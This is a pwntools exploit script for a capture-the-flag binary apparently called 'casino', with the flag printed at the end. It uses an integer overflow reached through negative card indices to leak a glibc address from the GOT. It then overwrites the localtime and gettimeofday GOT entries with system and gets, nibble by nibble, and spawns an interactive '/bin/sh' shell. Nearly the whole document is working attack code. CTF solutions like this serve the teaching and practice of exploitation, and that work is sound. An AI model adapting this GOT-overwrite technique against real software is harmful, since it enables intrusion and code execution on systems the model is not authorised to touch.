from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

p = gdb.debug('./casino_patched', '''
    continue
''')

# p = remote('20.84.72.194', 5004)

# there is integer overflow vulnerability which allows to leak and overwrite GOT table entries

# considering little endian, this solution follows:
# for each qword, leak and overwrite operations are performed from last non-zero byte to first byte (left to right)
# for each byte, leak and overwrite operations are performed on first nibble then second nibble (right to left)

# specifically for overwrite operations:
# since each nibble can only be replaced randomly, checking if a replaced nibble matches expected value before moving on to next is necessary
# expected value of zero nibble must be skipped, because zero nibble cannot be generated by RNG in this challenge

# this solution only works when:
# only first nibble of first byte of glibc system addres is zero
# only first nibble of first byte and second byte of glibc gets addres is zero

# 1. initialize
CARD = 0x40e8
p.sendlineafter(b'Enter your name: ', b'A'*0x3f)
pause()

# 2. leak glibc base address through integer overflow
FGETS_GOT = 0x4040
p.sendlineafter(b"Choose an option: ", b'1')
glibc_fgets_nibbles = []
for i in range(12):
    p.sendlineafter(b"Choose an option: ", b'1')
    p.sendlineafter(b"Which card to view? ", str(-((CARD-(FGETS_GOT+8))*2+4+1+i)).encode())
    currrent_nibble = p.recvline().strip().split(b"(0x")[1].split(b")")[0].decode().lower()
    glibc_fgets_nibbles.append(currrent_nibble)
    if i % 2 != 0:
        temp_nibble = glibc_fgets_nibbles[-1]
        glibc_fgets_nibbles[-1] = glibc_fgets_nibbles[-2]
        glibc_fgets_nibbles[-2] = temp_nibble
glibc_e = ELF('./libc.so.6')
glibc_base_addr = int(''.join(glibc_fgets_nibbles), 16)-glibc_e.sym.fgets
log.info(f"glibc base address: {hex(glibc_base_addr)}")
p.sendlineafter(b"Choose an option: ", b'4')
pause()

# 3. overwrite GOT table entry (localtime -> system) through integer overflow
LOCALTIME_GOT = 0x4000
p.sendlineafter(b"Choose an option: ", b'1')
glibc_system_nibbles = list(hex(glibc_base_addr+glibc_e.sym.system)[2:])
for i in range(0, len(glibc_system_nibbles), 2):
    if i + 1 < len(glibc_system_nibbles):
        temp_nibble = glibc_system_nibbles[i]
        glibc_system_nibbles[i] = glibc_system_nibbles[i+1]
        glibc_system_nibbles[i+1] = temp_nibble
for i in range(12):
    while True:
        if glibc_system_nibbles[i] == '0':
            break
        p.sendlineafter(b"Choose an option: ", b'2')
        p.sendlineafter(b"Which card index to replace? ", str(-((CARD-(LOCALTIME_GOT+8))*2+4+1+i)).encode())
        currrent_nibble = p.recvline().strip().split(b"(0x")[1].split(b")")[0].decode().lower()
        p.sendlineafter(b"Choose an option: ", b'4')
        p.sendlineafter(b"Choose an option: ", b'1')
        if currrent_nibble == glibc_system_nibbles[i]:
            break
p.sendlineafter(b"Choose an option: ", b'4')
pause()

# 4. overwrite GOT table entry (gettimeofday -> gets) through integer overflow
GETTIMEOFDAY_GOT = 0x4028
p.sendlineafter(b"Choose an option: ", b'1')
glibc_gets_nibbles = list(hex(glibc_base_addr+glibc_e.sym.gets)[2:])
for i in range(0, len(glibc_gets_nibbles), 2):
    if i + 1 < len(glibc_gets_nibbles):
        temp_nibble = glibc_gets_nibbles[i]
        glibc_gets_nibbles[i] = glibc_gets_nibbles[i+1]
        glibc_gets_nibbles[i+1] = temp_nibble
for i in range(12):
    while True:
        if glibc_gets_nibbles[i] == '0':
            break
        p.sendlineafter(b"Choose an option: ", b'2')
        p.sendlineafter(b"Which card index to replace? ", str(-((CARD-(GETTIMEOFDAY_GOT+8))*2+4+1+i)).encode())
        currrent_nibble = p.recvline().strip().split(b"(0x")[1].split(b")")[0].decode().lower()
        p.sendlineafter(b"Choose an option: ", b'4')
        p.sendlineafter(b"Choose an option: ", b'1')
        if currrent_nibble == glibc_gets_nibbles[i]:
            break
p.sendlineafter(b"Choose an option: ", b'4')
pause()

# 5. trigger system("/bin/sh")
p.sendlineafter(b"Choose an option: ", b'3')
p.sendlineafter(b"Thanks for playing at the Squ1rrel Casino!\n", b'/bin/sh\x00')

p.interactive()

# squ1rrel{80%_0f_4ll_g4mbl3rs_qu1t_b3f0r3_th31r_b1g_pwn!}